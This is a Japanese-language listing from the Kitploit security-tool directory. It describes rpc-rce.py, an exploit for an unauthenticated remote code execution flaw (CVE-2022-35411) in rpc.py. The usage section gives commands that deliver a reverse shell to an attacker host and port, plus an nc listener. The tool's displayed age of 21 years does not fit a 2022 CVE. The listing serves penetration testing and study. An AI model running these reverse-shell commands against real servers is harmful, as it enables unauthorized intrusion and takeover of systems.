Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
rpc-rce.py — CVE-2022-35411 のエクスプロイト — rpc.py (<= 0.6.0) における認証されていないRCE | Kitploit
ツール/GitHubGitHub/cspanias/rpc-rce.py
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubcspanias/rpc-rce.py

rpc-rce.py

CVE-2022-35411 のエクスプロイト — rpc.py (<= 0.6.0) における認証されていないRCE

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

rpc.py RCE エクスプロイト (CVE-2022-35411)

これは CVE-2022-35411 向けの更新・改善されたエクスプロイトで、脆弱性のあるバージョンの rpc.py (<= 0.6.0) を標的としています。
Python の pickle 逆シリアル化を介した 認証なしのリモートコード実行 (RCE) を可能にします。

元のエクスプロイト: Elias Hohl
拡張者: x7331 - ユーザビリティ、ポータビリティ、自動化のため


脆弱性の概要

この脆弱性は、rpc.py が Python の pickle モジュールを安全でない方法で使用していることに起因し、細工されたペイロードにより 認証なしで 任意のコマンドを実行できるようにします。

  • CVE ID: CVE-2022-35411
  • 影響を受けるバージョン: rpc.py v0.4.2 – v0.6.0
  • エクスプロイトタイプ: 認証なしのリモートコード実行 (RCE)

変更点

  • ✅ --lhost、--lport、--target、--dry-run フラグを備えた argparse に切り替え
  • ✅ クリーンでモジュール化されたコード構造
  • ✅ オプションのリバースシェル配信 (TCP Bash)
  • ✅ Curl テストペイロード (セーフモード)
  • ✅ ログ出力サポートとよりクリーンな出力
  • ✅ -h / --help による適切な使用ガイダンス
  • ✅ 明確化のためのメタデータとインラインコメント

使用方法

リバースシェルの例

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

ドライラン (シェルなし、curl テストのみ)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

カスタムターゲット (オプション)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

必要条件

  • Python 3.x
  • requests ライブラリ (pip install requests でインストール)
  • あなたの LHOST 上でのリスナー (例: nc -lvnp 9001)
  • 脆弱性のある rpc.py サーバーが実行中であること

法的および倫理的注意

このエクスプロイトは教育および許可されたテスト目的のみで提供されます。 所有していないシステムや明示的なテスト許可がないシステムでは使用しないでください。

ツールをダウンロード